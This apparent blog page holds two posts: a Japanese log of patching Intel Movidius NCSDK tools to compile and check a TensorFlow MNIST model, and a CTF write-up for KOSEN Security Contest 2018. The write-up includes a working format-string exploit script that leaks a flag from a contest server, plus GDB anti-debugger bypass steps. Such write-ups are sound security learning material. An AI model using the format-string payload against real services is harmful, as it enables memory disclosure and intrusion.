<                                     int(shape[3]),
<                                     int(shape[1]),
<                                     int(shape[2])],
---
>                                    [int(1),
>                                     int(1),
>                                     int(shape[0]),
>                                     int(shape[1])],

ただし、このままでは

250         greyscale = True if new_size[2] == 1 else False

の時にxの値を見てgreyscaleを判断してしまう。
なので、new_size[2]ではなく、new_size[1]書き換える。誤植？

/usr/local/bin/ncsdk/Controllers/MiscIO.py

250c250
<         greyscale = True if new_size[2] == 1 else False
---
>         greyscale = True if new_size[1] == 1 else False

このパッチを当てて実行すると、

tokunn@nanase 11:16:22 [~/Documents/week2/0911/output] $ mvNCCheck mnist_inference.meta -s 12 -in input -on output -of mnist_inference.graph -i ../JPEGImages/pickup/00013.jpg
mvNCCheck v02.00, Copyright @ Movidius Ltd 2016

Input image shape [1, 784]
image path ../JPEGImages/pickup/00013.jpg
/usr/local/lib/python3.6/dist-packages/skimage/transform/_warps.py:84: UserWarning: The default mode, 'constant', will be changed to 'reflect' in skimage 0.15.
  warn("The default mode, 'constant', will be changed to 'reflect' in "
Traceback (most recent call last):
  File "/usr/local/bin/mvNCCheck", line 152, in <module>
    quit_code = check_net(args.network, args.image, args.inputnode, args.outputnode, args.nshaves, args.inputsize, args.weights, args)
  File "/usr/local/bin/mvNCCheck", line 130, in check_net
    net = parse_tensor(args, myriad_config, file_gen=True)
  File "/usr/local/bin/ncsdk/Controllers/TensorFlowParser.py", line 274, in parse_tensor
    channel_swap=arguments.channel_swap)
  File "/usr/local/bin/ncsdk/Controllers/MiscIO.py", line 290, in parse_img
    data[0] = data[0][np.argsort(channel_swap), :, :]
IndexError: index 2 is out of bounds for axis 0 with size 1

と新しいエラーが出る。
なので、とりあえずパッチを当てる。

/usr/local/bin/ncsdk/Controllers/TensorFlowParser.py

272,274c272,274
<                                    raw_scale=arguments.raw_scale,
<                                    mean=arguments.mean,
<                                    channel_swap=arguments.channel_swap)
---
>                                    raw_scale=1,
>                                    mean=None,
>                                    channel_swap=None)

これで実行すると、

tokunn@nanase 11:41:03 [~/Documents/week2/0911/output] $ mvNCCheck mnist_inference.meta -s 12 -in input -on output -of mnist_inference.graph -i ../JPEGImages/pickup/00013.jpg
mvNCCheck v02.00, Copyright @ Movidius Ltd 2016

input_data shape (1, 1, 1, 784)
Traceback (most recent call last):
  File "/usr/local/bin/mvNCCheck", line 152, in <module>
    quit_code = check_net(args.network, args.image, args.inputnode, args.outputnode, args.nshaves, args.inputsize, args.weights, args)
  File "/usr/local/bin/mvNCCheck", line 130, in check_net
    net = parse_tensor(args, myriad_config, file_gen=True)
  File "/usr/local/bin/ncsdk/Controllers/TensorFlowParser.py", line 281, in parse_tensor
    res = outputTensor.eval(feed_dict={inputnode + ':0' : input_data})
  File "/usr/local/lib/python3.6/dist-packages/tensorflow/python/framework/ops.py", line 570, in eval
    return _eval_using_default_session(self, feed_dict, self.graph, session)
  File "/usr/local/lib/python3.6/dist-packages/tensorflow/python/framework/ops.py", line 4455, in _eval_using_default_session
    return session.run(tensors, feed_dict)
  File "/usr/local/lib/python3.6/dist-packages/tensorflow/python/client/session.py", line 889, in run
    run_metadata_ptr)
  File "/usr/local/lib/python3.6/dist-packages/tensorflow/python/client/session.py", line 1096, in _run
    % (np_val.shape, subfeed_t.name, str(subfeed_t.get_shape())))
ValueError: Cannot feed value of shape (1, 1, 784, 1) for Tensor 'input:0', which has shape '(1, 784)'

とエラーが出る。
終わりがない。
これやる意味あるのか？
別にmvNCCheckで画像を与えなくてもよくない？
PythonでのAPI追いかけるべきでは？
mvNCCheckのランダムでgraphは正しいと思ったけど、そもそも出力されたグラフがおかしかったら、tensorflowでやったやつもおかしな結果を出力するのでは

DAY2

やっぱり4次元にしたところで入力は２次元なので入力できない。
さらに、雑なパッチを当てる。これでほかの画像は入力できないし、ほかのネットワークにも対応できない。

/usr/local/bin/ncsdk/Controllers/TensorFlowParser.py

204c204
<     debug = True
---
>     # debug = True
277a278
>             input_data = input_data.transpose([0, 1, 3, 2])[0][0]
279a281
>                 #print(input_data)
297d298
<                 print("/usr/local/bin/ncsdk/Controllers/TensorFlowParser.py line no.290")

実行してみる。

tokunn@nanase 23:49:44 [~/Documents/week2/0912/output] $ for i in $(ls ../JPEGImages/pickup/); do echo $i; mvNCCheck mnist_inference.meta -s 12 -in input -on output -of mnist_inference.graph -i ../JPEGImages/pickup/$i 2>/dev/null; done
1.jpg

Result:  (1, 1, 10)
1) 2 0.28613
Expected:  (1, 10)
1) 2 0.281931
------------------------------------------------------------
2.jpg

Result:  (1, 1, 10)
1) 2 0.81348
Expected:  (1, 10)
1) 2 0.81391
------------------------------------------------------------
3.jpg

Result:  (1, 1, 10)
1) 2 0.87158
Expected:  (1, 10)
1) 2 0.870968
------------------------------------------------------------
4.jpg

Result:  (1, 1, 10)
1) 3 0.39771
Expected:  (1, 10)
1) 3 0.40986
------------------------------------------------------------
5.jpg

Result:  (1, 1, 10)
1) 2 0.70898
Expected:  (1, 10)
1) 2 0.712083
------------------------------------------------------------
6.jpg

Result:  (1, 1, 10)
1) 5 0.77686
Expected:  (1, 10)
1) 5 0.773194
------------------------------------------------------------
7.jpg

Result:  (1, 1, 10)
1) 5 0.49268
Expected:  (1, 10)
1) 5 0.499106
------------------------------------------------------------
8.jpg

Result:  (1, 1, 10)
1) 2 0.95605
Expected:  (1, 10)
1) 2 0.955554
------------------------------------------------------------
9.jpg

Result:  (1, 1, 10)
1) 2 0.50293
Expected:  (1, 10)
1) 2 0.494139
------------------------------------------------------------

やっぱりほとんどの数字が２だと出力される。
ただし、mvNCCheckからの場合には確率は100%ではない。

PythonAPIから呼び出しても、mvNCCheckから呼び出しても同じ結果が返ってくる。
ということは変換したgraphファイルがおかしいということがわかる。

mvNCCompileに渡したファイルか、mvNCCompileのどちらかが間違えている。

deep_mnistのサンプルをgithub上のコードでやってみる

deep_mnistのサンプルがgithub上にあった。 https://github.com/ashwinvijayakumar/ncappzoo/tree/mnist/tensorflow/mnist

動く。
mvNCCompileのパッチを元に戻しても大丈夫。
自分で用意したgraphとJPEGにしても動く。
あれ
これは、私がAPIを正しく使えていないのでは？ (もちろんmvNCCheck -i のほうはIndexError)
ただ、Intelのサンプルは確実に間違えていた。

原因

黒地に白字で学習させてたのに、推論の時に白地に黒字の画像でやっていた
画像を読み込んだ後に255で割るのを忘れていた
mvNCCheckに画像を読み込ませる機能は動かない

ずっと、おかしな出力だと思っていたものは正しい出力であった。

結論 (動作した方法・ソースコード)

３つの問題を解決することができた。
1. TensorFlowのモデルをmvNCCompileでコンパイルできない
-> TensorFlowParser.pyの書き換え
2. mvNCCheckに-iオプションで画像を読み込ませることができるらしいが、動かない
-> TensorFlowParser.pyとMiscIO.pyをモデルに合わせて書き換え（汎用性なし）
3. 推論の結果がおかしい
-> 入力がおかしい

mvNCCompileの書き換え

/usr/local/bin/ncsdk/Controllers/TensorFlowParser.pyの290行目付近を編集して、配列の要素を確認してからアクセスるようにする。

<                 if have_first_input(strip_tensor_id(node.outputs[0].name)):
---
>                 if len(node.outputs) and have_first_input(strip_tensor_id(node.outputs[0].name)):

これで、mvNCCompileは通るようになる。

mvNCCheckの書き換え

/usr/local/bin/ncsdk/Controllers/MiscIO.pyの250行目付近を編集。

250c250
<         greyscale = True if new_size[2] == 1 else False
---
>         greyscale = True if new_size[1] == 1 else False

/usr/local/bin/ncsdk/Controllers/TensorFlowParser.pyの270行目付近を編集。

265,271c265,271
<                                    [int(shape[0]),
<                                     int(shape[3]),
<                                     int(shape[1]),
<                                     int(shape[2])],
<                                    raw_scale=arguments.raw_scale,
<                                    mean=arguments.mean,
<                                    channel_swap=arguments.channel_swap)
---
>                                    [int(1),
>                                     int(1),
>                                     int(shape[0]),
>                                     int(shape[1])],
>                                    raw_scale=1,
>                                    mean=None,
>                                    channel_swap=None)
272a273
>             input_data = input_data.transpose([0, 1, 3, 2])[0][0]

これで

mvNCCheck mnist_inference.meta -s 12 -in input -on output -of mnist_inference.graph -i ../github_deep_mnist/ncappzoo/data/digit_images/one.png  -S 255

で動き出す。ただし結果は？。入力する画像を加工すべき？

メインプログラム（学習用）

from tensorflow.examples.tutorials.mnist import input_data
import tensorflow as tf
import tempfile
def deepnn(x):
    with tf.name_scope('reshape'):
        x_image = tf.reshape(x, [-1, 28, 28, 1]) # -1 = number of x
        
    with tf.name_scope('conv1'):
        W_conv1 = weight_variable([5, 5, 1, 32])
        b_conv1 = bias_variable([32])
        h_conv1 = tf.nn.relu(conv2d(x_image, W_conv1) + b_conv1)
        
    with tf.name_scope('pool1'):
        h_pool1 = max_pool_2x2(h_conv1)
        
    with tf.name_scope('conv2'):
        W_conv2 = weight_variable([5, 5, 32, 64])
        b_conv2= bias_variable([64])
        h_conv2 = tf.nn.relu(conv2d(h_pool1, W_conv2) + b_conv2)
        
    with tf.name_scope('pool1'):
        h_pool2 = max_pool_2x2(h_conv2)
        
    with tf.name_scope('fc1'):
        W_fc1 = weight_variable([7 * 7 * 64, 1024])
        b_fc1 = bias_variable([1024])
        
        h_pool2_flat = tf.reshape(h_pool2, [-1, 7*7*64])
        h_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat, W_fc1) + b_fc1)
        
    with tf.name_scope('dropout'):
        keep_prob = tf.placeholder(tf.float32)
        h_fc1_drop = tf.nn.dropout(h_fc1, keep_prob)
        
    with tf.name_scope('fc2'):
        W_fc2 = weight_variable([1024, 10])
        b_fc2 = bias_variable([10])
        
        y_conv = tf.matmul(h_fc1_drop, W_fc2) + b_fc2
    
    return y_conv, keep_prob
def conv2d(x, W):
    return tf.nn.conv2d(x, W, strides=[1,1,1,1], padding='SAME')
def max_pool_2x2(x):
    return tf.nn.max_pool(x, ksize=[1,2,2,1], strides=[1,2,2,1], padding='SAME')
def weight_variable(shape):
    initial = tf.truncated_normal(shape, stddev=0.1) # random
    return tf.Variable(initial)
def bias_variable(shape):
    initial = tf.constant(0.1, shape=shape) # all 0.1
    return tf.Variable(initial)
def main():
    mnist = input_data.read_data_sets('MNIST_data', one_hot=True)
    
    x = tf.placeholder(tf.float32, [None, 784], name='input')
    y_ = tf.placeholder(tf.float32, [None, 10])
    
    y_conv, keep_prob = deepnn(x)
    
    with tf.name_scope('loss'):
        cross_entropy = tf.nn.softmax_cross_entropy_with_logits(labels=y_, logits=y_conv)
    cross_entropy = tf.reduce_mean(cross_entropy)
    
    with tf.name_scope('adam_optimizer'):
        train_step = tf.train.AdamOptimizer(1e-4).minimize(cross_entropy)
    
    with tf.name_scope('accuracy'):
        correct_prediction = tf.equal(tf.argmax(y_conv, 1), tf.argmax(y_, 1))
        correct_prediction = tf.cast(correct_prediction, tf.float32)
    accuracy = tf.reduce_mean(correct_prediction)
    
    graph_location = tempfile.mkdtemp()
    print('saving graph to: %s' % graph_location)
    train_writer = tf.summary.FileWriter(graph_location)
    train_writer.add_graph(tf.get_default_graph())
    
    saver = tf.train.Saver()
    
    with tf.Session() as sess:
        sess.run(tf.global_variables_initializer())
        for i in range(500):
            batch = mnist.train.next_batch(50)
            if i % 10 == 0:
                train_accuracy = accuracy.eval(feed_dict={x: batch[0], y_: batch[1], keep_prob: 1.0})
                print('step %d, training accuracy %g' % (i, train_accuracy))
            train_step.run(feed_dict={x: batch[0], y_: batch[1], keep_prob: 0.5})
        
        print('test accuracy %g' % accuracy.eval(feed_dict={x: mnist.test.images, y_: mnist.test.labels, keep_prob: 1.0}))
        
        graph_location = "."
        save_path = saver.save(sess, graph_location + "/mnist_model")
main()

モデル変換用

from tensorflow.examples.tutorials.mnist import input_data
import tensorflow as tf
import tempfile
def deepnn(x):
    with tf.name_scope('reshape'):
        x_image = tf.reshape(x, [-1, 28, 28, 1]) # -1 = number of x
        
    with tf.name_scope('conv1'):
        W_conv1 = weight_variable([5, 5, 1, 32])
        b_conv1 = bias_variable([32])
        h_conv1 = tf.nn.relu(conv2d(x_image, W_conv1) + b_conv1)
        
    with tf.name_scope('pool1'):
        h_pool1 = max_pool_2x2(h_conv1)
        
    with tf.name_scope('conv2'):
        W_conv2 = weight_variable([5, 5, 32, 64])
        b_conv2= bias_variable([64])
        h_conv2 = tf.nn.relu(conv2d(h_pool1, W_conv2) + b_conv2)
        
    with tf.name_scope('pool1'):
        h_pool2 = max_pool_2x2(h_conv2)
        
    with tf.name_scope('fc1'):
        W_fc1 = weight_variable([7 * 7 * 64, 1024])
        b_fc1 = bias_variable([1024])
        
        h_pool2_flat = tf.reshape(h_pool2, [-1, 7*7*64])
        h_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat, W_fc1) + b_fc1)
        
    with tf.name_scope('fc2'):
        W_fc2 = weight_variable([1024, 10])
        b_fc2 = bias_variable([10])
        
        y_conv = tf.matmul(h_fc1, W_fc2) + b_fc2
    
    return y_conv
def conv2d(x, W):
    return tf.nn.conv2d(x, W, strides=[1,1,1,1], padding='SAME')
def max_pool_2x2(x):
    return tf.nn.max_pool(x, ksize=[1,2,2,1], strides=[1,2,2,1], padding='SAME')
def weight_variable(shape):
    initial = tf.truncated_normal(shape, stddev=0.1) # random
    return tf.Variable(initial)
def bias_variable(shape):
    initial = tf.constant(0.1, shape=shape) # all 0.1
    return tf.Variable(initial)
def main():
    x = tf.placeholder(tf.float32, [None, 784], name='input')

    y_conv = deepnn(x)
    output = tf.nn.softmax(y_conv, name='output')
    
    saver = tf.train.Saver()
    
    with tf.Session() as sess:
        sess.run(tf.global_variables_initializer())
        sess.run(tf.local_variables_initializer())
        
        saver.restore(sess, '.' + '/output/mnist_model')
        saver.save(sess, '.' + '/output/mnist_inference')
main()

コンパイル

mvNCCompile mnist_inference.meta -s 12 -in input -on output -o mnist_inference.graph

もしinputとoutputのノードの名前がinputとoutpuであれば、-inと-onいらないかもしれない。

Movidiusでの推論

import mvnc.mvncapi as mvnc
import numpy as np
from PIL import Image
import cv2
import time, sys, os

import glob

IMAGE_DIR_NAME = './JPEGImages/pickup/'
#IMAGE_DIR_NAME = 'github_deep_mnist/ncappzoo/data/digit_images'

def predict(input):
    print("Start prediting ...")
    devices = mvnc.EnumerateDevices()
    device = mvnc.Device(devices[0])
    device.OpenDevice()

    # Load graph file data
    with open('./output/mnist_inference.graph', 'rb') as f:
        graph_file_buffer = f.read()

    # Initialize a Graph object
    graph = device.AllocateGraph(graph_file_buffer)

    start = time.time()
    for i in range(len(input)):
        # Write the tensor to the input_fifo and queue an inference
        graph.LoadTensor(input[i], None)
        output, userobj = graph.GetResult()
        print(np.argmax(output), end=' ')
    stop = time.time()
    print('')
    print("Time : {0} ({1} images)".format(stop-start, len(input)))

    graph.DeallocateGraph()
    device.CloseDevice()

    return output

if __name__ == '__main__':
    print("Image path : {0}".format(os.path.join(IMAGE_DIR_NAME, '*.jpg')))
    jpg_list = glob.glob(os.path.join(IMAGE_DIR_NAME, '*.jpg'))
    if not len(jpg_list):
        print("No image file")
        sys.exit()
    jpg_list.reverse()
    print([i.split('/')[-1] for i in jpg_list])
    img_list = []
    for n in jpg_list:
        image = cv2.imread(n)
        image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
        image = cv2.bitwise_not(image)
        iamge = cv2.resize(image, (28, 28))
        img_list.append(image)
    img_list = np.asarray(img_list)[:10] * (1.0/255.0)
    print("imgshape ", img_list.shape)
    predict(img_list.astype(np.float16))

2018-09-04

KOSEN Security Contest 2018 Write-Up

CTFを始めた友人のために英語でWrite-Upを書いてみます．英語は得意ではないのでいろいろとご了承くださいませ．

KOSEN Security Contest 2018 was held from September 1st to 2nd. It's a CTF for Kosen students.

I enter the contest with my Laboratory member and my juniors. Our team name is 074m4K053n and the team was 3rd position. (3rd / 36teams)

f:id:tokunn:20180903215121p:plain

I solved following questions.

[Sample] 100 Sample
[Binary] 100 printf
[Binary] 200 XOR, XOR
[Binary] 250 Simple anti debugger
[Network] 150 Login and Get flag
[Web] 100 Steal a information from Server
[Web] 300 Steal a account
[Misc] 50 I don't wanna see HITO OOSUGI
[Misc] 100 No disc space

f:id:tokunn:20180903220349p:plain

And I'll explain about these questions.

00 [Sample] 100 Sample

f:id:tokunn:20180903222520p:plain

[Question]

CTF is a competition which find answers called "flag".

The flag shape is SCKOSEN{foobar}.

In order to practice, submit current japanese era as flag.

example :

SHOWA (1926 - 1989) -> SCKOSEN{SHOWA}

MEIJI (1868 - 1912 ) -> SCKOSEN{MEIJI}

TAISHO (1912 - 1926) -> SCKOSEN{TAISHO}

[Solution]

This is sample question.

Current japanese era is Heisei (1989 - 2019).

So, flag is SCKOSEN{HEISEI}.

03 [Binary] 100 printf

f:id:tokunn:20180903224338p:plain

[Question]

Steal a flag !

How to connect to game : nc [foobar] [port] example: nc 27.133.152.42 80

[Solution]

Use sample command then get following strings.

$ nc 27.133.152.42 80

Secret is in 0xffc9a37e

What do you want:

Type "Earth" then get following strings.

$ nc 27.133.152.42 80

the secret is in 0xffc9a37e

what do you want: Earth

there is no Earth

Type "AAAA,%p,%p,%p,%p,%p,%p" and get

the secret is in 0xff985c6e
what do you want: AAAA,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p
there is no AAAA,0x100,0xf7ed65c0,(nil),(nil),(nil),(nil),0x43530000,0x45534f4b,0x73757b4e,0x72705f65,0x66746e69,0x726f635f,0x74636572,0x7d796c,0x41414141,0x2c70252c,0x252c7025,0x70252c70,0x2c70252c,0x252c7025

As you can see from the result, we could leak few value in the memory by using %p. So, we can use Format String Attack.

Let's see the result again

AAAA,

0x100,

0xf7ed65c0,

(nil),

(nil),

(nil),

(nil),

0x43530000,

0x45534f4b,

0x73757b4e,

0x72705f65,

0x66746e69,

0x726f635f,

0x74636572,

0x7d796c,

0x41414141,

We can find 0x41414141 (It's "AAAA" wiritten in ascii) at 15th position. The 0x41414141 is a string which I send.

So, if we send a address instead of "AAAA", we can read value from the address.

Attack string :

{secret address}, %15$s

We can get {secret address} from "the secret is in 0xff985c6e"

And python script is here :

#!/usr/bin/env python2

import socket

import struct

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect*1

res = s.recv(4096)

res += s.recv(4096)

print(res)

addr = int(res.split()[4],16)

#buf = "AAAA"

buf = struct.pack("<I", addr)

#buf += ',%p' * 20

buf += ',%15$s'

buf += '\n'

s.send(buf)

print(buf)

res = s.recv(4096)

res += s.recv(4096)

res += s.recv(4096)

print(res)

s.close()

And result is here :

the secret is in 0xffc0b52e
what do you want:
.��,%15$s

there is no .��,SCKOSEN{use_printf_correctly}

04 [Binary] 200 XOR, XOR

f:id:tokunn:20180904084954p:plain

[Question]

Read assembly and get flag !

[Solution]

There is a file the name is "asmreading".

First, check the file by using file command

$ file ./asmreading

asmreading: ELF 32-bit LSB pie executable Intel 80386 ........... , not stripped

It's ELF fexecutable file.

Next, use GDB debugger, and disassemble main function.

f:id:tokunn:20180904182441p:plain

We can see the ASCII codes and xor_func. So, xor_func seems to be decode function.

To check that, set break point after call xor_func and run the executable file.

f:id:tokunn:20180904182731p:plain

And then, we can find a decoded flag.

Flag is SCKOSEN{you_can_read_assembly}. (But I didn't read assembly ...)

05 [Binary] 250 Simple anti debugger

f:id:tokunn:20180904183010p:plain

[Question]

I attached it from GDB, but it doesn't work.

How can I analyse it ?

[Solution]

There is a file the name is "simple_anti_debugger".

First, check the file by using file command

$ file ./simple_anti_debugger

asmreading: ELF 32-bit LSB pie executable Intel 80386 ........... , not stripped

It's ELF fexecutable file.

Next, use GDB debugger. But I couldn't execute binary with debugger because of unti debug technique.

So first, see the function information. There is detect_debugger function. Let's try to avoid it.

f:id:tokunn:20180904203950p:plain

In detect_debugger function, eax register is compared with 0xffffff. If eax is 0xffffff, program will go to exit code.

To avoid it, I change the value in eax.

f:id:tokunn:20180904204003p:plain

And now, we can use debugger in main function.

f:id:tokunn:20180904204019p:plain

Change eax again to avoid password check.

f:id:tokunn:20180904204028p:plain

And then, we can get flag. Flag is SCKOSEN{I_like_debugger}.

I'll write other question later.....

*1: '27.133.152.42', 80